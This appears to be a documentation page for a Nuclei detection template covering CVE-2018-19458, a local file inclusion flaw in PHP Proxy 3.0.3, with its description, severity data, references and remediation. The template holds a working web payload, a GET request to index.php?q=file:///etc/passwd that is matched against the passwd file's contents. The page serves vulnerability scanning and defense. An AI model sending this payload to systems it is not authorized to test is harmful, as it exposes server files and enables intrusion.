PHP Proxy 3.0.3 - Local File Inclusion
ID: CVE-2018-19458
Severity: high
Author: daffainfo
Tags: cve,cve2018,edb,lfi,proxy,php-proxy
Description
Section titled “Description”PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
YAML Source
Section titled “YAML Source”id: CVE-2018-19458
info: name: PHP Proxy 3.0.3 - Local File Inclusion author: daffainfo severity: high description: | PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246). impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/45780 - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-19458 - https://www.exploit-db.com/exploits/45780/ - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 epss-score: 0.03301 epss-percentile: 0.91309 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php-proxy product: php-proxy tags: cve,cve2018,edb,lfi,proxy,php-proxy
http: - method: GET path: - "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402203171359091e3b70bc314e4512939e1ff665704034fe86db23a170b2bf4ca264102200e682425f90f5002d5653cbc11dabd6642975520642badce2ead4f97b09a0aa3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-19458.yaml"